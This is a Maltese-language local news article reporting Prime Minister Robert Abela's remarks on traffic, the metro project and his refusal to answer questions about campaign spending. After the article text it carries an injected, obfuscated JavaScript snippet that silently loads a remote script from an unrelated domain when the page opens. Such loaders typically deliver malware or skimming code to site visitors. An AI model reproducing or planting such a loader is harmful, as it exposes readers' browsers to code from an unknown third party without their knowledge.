Lokali

Skont Abela, it-traffiku mhux problema imma “realtà”

It-traffiku f’pajjiżna mhux problema imma huwa realtà.

Kien dan il-mod li bih Robert Abela iddeskriva l-kriżi li ta’ kuljum li qed niffaċjaw fit-toroq tagħna, meta f’kummenti li ta lil dan l-istazzjon stqarr li diġà qed isir ħafna minn naħa tal-Gvern. Għalkemm forsi, jista’ jsir aktar.

Il-Prim Ministru għamel ukoll referenza għad-diskussjonijitiet li qed issiru bejn il-Gvern u l-ARUP, il-konsulenti inkarigati mill-proġett tal-metro…. proġett li fl-aħħar ġimgħat il-Ministru tiegħu stess Clyde Caruana ħareġ jikkritikah b’mod qawwi.

Fi kliem Clyde Caruana, proġett bħal dan jitlob in-nefqa ta’ biljuni ta’ ewro u biex ikun vijjabbli n-nies ċertamnet iridu jħallu l-karozza d-dar.

Affaċċjat mid-domandi ta’ dan l-istazzjon, Abela qal li l-Gvern qed jinvesti fl-aqwa proġetti, dan minkejja li s-sitwazzjoni tat-traffiku f’pajjiżna hija waħda li qed twassal għal kritika kbira mill-poplu kollu li ta’ kuljum qed ikollu jqatta’ sigħat biex jasal minn post għall-ieħor; bis-sitwazzjoni tiġi ferm aktar gravi meta tkun ix-xita.

Bil-Prim Ministru jkompli jgħid li hemm diversi inizjattivi li għalkemm bosta qed jgħidu li mhux qed iwasslu għal soluzzjoni, huwa xorta waħda qal li jinsab kuntent bihom.

Intant, Net News staqsa wkoll lill-Prim Ministru jekk hu ppublikkax in-nefqa li kien għamel lura fl-2020 fil-kampanja għat-tmexxija, u jekk iva fejn huma dawn id-dokumenti. Però’ il-Prim Ministru irrifjuta kompletament li jwieġeb dawn il-mistoqsijiet tant li telaq mill-post.

Bil-Prim Ministru ma jikkometti ruħu inqas jekk hux se jaċċetta d-dibatitu li Alex Borg stiednu għalih.

;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, ‘script’, `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);